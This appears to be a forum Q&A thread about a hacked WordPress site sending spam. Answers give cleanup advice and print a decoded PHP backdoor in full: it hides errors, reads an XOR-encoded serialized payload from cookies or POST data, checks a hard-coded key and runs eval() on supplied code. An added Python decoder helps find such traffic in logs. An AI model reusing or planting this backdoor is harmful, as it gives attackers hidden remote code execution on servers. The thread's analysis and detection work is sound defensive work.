Maybe my WordPress site is hacked, because it's always sending spam (5000 per day). I found one file in the plugins folder which contains this base64 code.
What should I do?
EDIT: Oh, I found another one.
EDIT 2: And another one.
Actually you can deobfuscate the JS malware you received. You could do it yourself in a few hours. You can see the attacker is substituting the alphabet and the numbers from 0 to 9 and then encoding them.
The spam you receive could hence result from that malware. It will be good for you to study how it works exactly in order to take the appropriate actions.
Otherwise, if you do not have experience with such malware code analysis then do not panic. Try to find also where the code is generated from (which could sometimes be a harder task) by fully scanning your local environment, and follow the other steps mentioned here to get rid of it.
Of course, after getting rid of it, you will need to change your authentication credentials and check your logs for exploits and suspicious IP addresses, using Fail2ban to update your firewall rules.
begueradj's answer is good; I only want to add that I went ahead and decoded the data. What executes doesn't look like anything related to spam email; rather it looks like logic related to cookies, though I'm not sure exactly what it's doing (anyone more fluent with PHP willing to take a stab?). Code included below:
// Silence error reporting and remove the execution time limit so the
// backdoor never logs anything and never times out.
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
if(!defined("PHP_EOL"))
{
define("PHP_EOL", "\n");
}
if(!defined("DIRECTORY_SEPARATOR"))
{
define("DIRECTORY_SEPARATOR", "/");
}
$data = NULL;
$data_key = NULL;
// Hard-coded key: used both as an XOR layer and as the password ('ak') the
// request must present.
$GLOBALS['auth'] = 'f3e90c82-5938-49aa-82db-d122a5b73318';
global $auth;
// Repeating-key XOR; XOR is symmetric, so the same routine encrypts and decrypts.
function sh_decrypt_phase($data, $key)
{
$out_data = "";
for ($i=0; $i<strlen($data);)
{
for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
{
$out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
}
}
return $out_data;
}
// Two XOR passes: first with the hard-coded $auth key, then with the name
// of the cookie/POST field that carried the payload.
function sh_decrypt($data, $key)
{
global $auth;
return sh_decrypt_phase(sh_decrypt_phase($data, $auth), $key);
}
// Take the LAST cookie as the payload (name = key, value = data) ...
foreach ($_COOKIE as $key=>$value)
{
$data = $value;
$data_key = $key;
}
// ... or, if there were no cookies, the last POST field.
if (!$data)
{
foreach ($_POST as $key=>$value)
{
$data = $value;
$data_key = $key;
}
}
// base64 -> double XOR -> PHP unserialize() gives an array of commands.
$data = @unserialize(sh_decrypt(@base64_decode($data), $data_key));
// Only act if the request knows the key ('ak').
if (isset($data['ak']) && $auth==$data['ak'])
{
// Action 'i': report PHP version and backdoor version (fingerprinting).
if ($data['a'] == 'i')
{
$i = Array(
'pv' => @phpversion(),
'sv' => '1.0-1',
);
echo @serialize($i);
}
// Action 'e': execute arbitrary PHP supplied in 'd' (remote code execution).
elseif ($data['a'] == 'e')
{
eval($data['d']);
}
}
EDIT: Looks like the last file you posted is the culprit for sending the spam emails. Here's the decoded version. I didn't analyze all 3000(!) lines, but you've got a function in there named sendSmtpMail, which seems like a pretty good indicator of what the code is (at least partially) doing.
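For anyone who wants to check their access logs for traffic to this backdoor without running any of it, here is an added example (not from any answer on this page) that re-implements the decoded input handling in Python: base64, the two XOR passes, and a minimal reader for the PHP-serialized array, reporting whether a captured cookie or POST pair carries the key and which action it requests. The sample request, the cookie name `sess` and the function names are constructed for this example.

```python
import base64
import re

# Key hard-coded in the decoded backdoor above ($GLOBALS['auth']).
AUTH = 'f3e90c82-5938-49aa-82db-d122a5b73318'

def xor_phase(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same operation as sh_decrypt_phase()."""
    # The PHP version loops forever on an empty key; treat that as a no-op here.
    if not key:
        return data
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def parse_php_string_array(blob: bytes) -> dict:
    """Minimal reader for a flat PHP-serialized array of string keys and values."""
    m = re.match(rb'a:(\d+):\{', blob)
    if not m:
        raise ValueError('not a serialized PHP array')
    pos, items = m.end(), []
    while blob[pos:pos + 1] != b'}':
        s = re.match(rb's:(\d+):"', blob[pos:])
        if not s:
            raise ValueError('only string members are handled')
        start, length = pos + s.end(), int(s.group(1))
        items.append(blob[start:start + length].decode('latin-1'))
        pos = start + length + 2          # skip the closing quote and ';'
    return dict(zip(items[0::2], items[1::2]))

def decode_request(param_name: str, param_value: str, auth: str = AUTH) -> dict:
    """Replay the backdoor's input handling on one captured name/value pair
    without executing anything: reports whether it carries the key and which
    action ('i' = fingerprint the server, 'e' = eval supplied code) it asks for."""
    try:
        raw = base64.b64decode(param_value)
        plain = xor_phase(xor_phase(raw, auth.encode()), param_name.encode())
        fields = parse_php_string_array(plain)
    except ValueError:                    # bad base64 or not the expected format
        return {'authenticated': False, 'action': None, 'code': None}
    if fields.get('ak') != auth:
        return {'authenticated': False, 'action': None, 'code': None}
    action = {'i': 'fingerprint', 'e': 'eval'}.get(fields.get('a'), 'unknown')
    return {'authenticated': True, 'action': action, 'code': fields.get('d')}

# Constructed sample, not taken from the asker's logs: the request the 'i'
# branch expects, built with the same symmetric XOR so the decoder can be
# exercised offline. Remember the backdoor reads only the LAST cookie/POST field.
SAMPLE_NAME = 'sess'
_plain = b'a:2:{s:2:"ak";s:36:"' + AUTH.encode() + b'";s:1:"a";s:1:"i";}'
SAMPLE_VALUE = base64.b64encode(
    xor_phase(xor_phase(_plain, AUTH.encode()), SAMPLE_NAME.encode())).decode()
```

An ordinary cookie such as a PHPSESSID decodes to garbage and is reported as not authenticated, so the function can be run over every cookie and POST field in a log export to separate real backdoor traffic from noise.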
It's the same remote php shell I decoded here:
What is this? Virus or scanner?
There are only minor changes, and of course the changed $GLOBALS["auth"] variable containing the code encryption key, which means that this code has probably been embedded by a bot belonging to a different owner.